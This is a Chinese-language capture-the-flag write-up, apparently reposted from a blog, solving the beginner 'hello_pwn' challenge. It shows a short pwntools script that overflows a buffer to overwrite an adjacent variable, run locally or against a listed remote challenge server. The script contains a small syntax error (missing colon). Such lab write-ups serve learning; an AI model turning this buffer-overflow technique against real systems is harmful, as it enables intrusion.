当前位置:网站首页>攻防世界新手入门hello_pwn

攻防世界新手入门hello_pwn

2022-06-28 12:07:00 Day-3

在这里插入图片描述

首先,我们先看一下文件。然后看一下它的保护。
在这里插入图片描述
没有什么防护。运行一下试试:
在这里插入图片描述
放入IDA中查看,
在这里插入图片描述
需要我们在unk_601068上填充数据,然后将dword_60106C地址中的内容覆盖为1853186401.
在这里插入图片描述
编写Python代码:

from pwn import *
context(os='Linux',arch="amd64",log_level="debug")
content = 1

def main()
	if content == 1:
		day3 = process("hello_pwn")
	else:
		day3 =remote("111.200.241.244",49744)
	payload = b'a' * (0x6c - 0x68) + p64(1853186401)
	day3.recvuntil("lets get helloworld for bof\n")
	day3.sendline(payload)
	day3.interactive()

main()

process和remote连接本地程序,也就是常说的打本地和打远程。
加b设为比特流,意为传送数据,p64打包,将数据打包成一个字节流。
在这里插入图片描述
得到Flag。

原网站

版权声明
本文为[Day-3]所创,转载请带上原文链接,感谢
https://blog.csdn.net/weixin_61823031/article/details/125493562

边栏推荐

猜你喜欢

随机推荐